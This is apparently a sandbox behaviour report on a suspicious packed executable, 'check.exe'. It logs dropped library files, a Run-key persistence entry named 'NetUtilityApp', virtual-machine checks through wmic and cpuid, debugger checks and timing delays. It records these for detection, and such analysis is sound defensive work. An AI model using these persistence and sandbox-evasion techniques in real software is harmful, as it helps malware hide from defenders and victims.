Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\libcrypto-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\MSVCP140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Core.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\QtWidgets.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\libffi-8.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Gui.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\libffi-8.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Widgets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\libGLESv2.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\libssl-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\MSVCP140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Core.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\QtGui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\MSVCP140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Gui.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\QtWidgets.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityAppJump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 4_2_00007FF7124F5830 GetProcAddress, GetLastError (this call pair repeats many times in the function)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5613
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4052
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_4-17950
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe API coverage: 2.8 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1436 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 4_2_00007FF7124F83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF7124F83C0
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 4_2_00007FF7124F9280 FindFirstFileExW,FindClose,4_2_00007FF7124F9280
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 4_2_00007FF712511874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF712511874
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 5_2_00007FF7124F9280 FindFirstFileExW,FindClose,5_2_00007FF7124F9280
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 5_2_00007FF7124F83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF7124F83C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: check.exe, 00000005.00000003.2279631020.0000029FD986E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283352961.0000029FD986E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2280765304.0000029FD986E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWU
Source: check.exe, 00000004.00000003.2256005056.000001C184425000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
Source: check.exe, 00000005.00000002.2737284106.0000029FD96C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: nfQEMU
Source: check.exe, 00000005.00000002.2743640396.00007FF89E208000.00000008.00000001.01000000.00000024.sdmp Binary or memory string: .?AVQEmulationPaintEngine@@
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 4_2_00007FF7124FD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF7124FD12C
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 4_2_00007FF712513480 GetProcessHeap,4_2_00007FF712513480
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 4_2_00007FF7124FD30C SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 4_2_00007FF7124FC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 4_2_00007FF71250A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 5_2_00007FF7124FD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 5_2_00007FF89ECA2C90 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 14_2_00007FF89A6C65D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 14_2_00007FF89BD32C90 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 14_2_00007FF89BD33248 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 22_2_00007FF898C165D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 22_2_00007FF898C16484 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Process created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 4_2_00007FF712519570 cpuid
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5 VolumeInformation
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5 VolumeInformation
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin VolumeInformation
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins VolumeInformation
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats VolumeInformation
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms VolumeInformation
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations VolumeInformation
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5 VolumeInformationJump to behavior
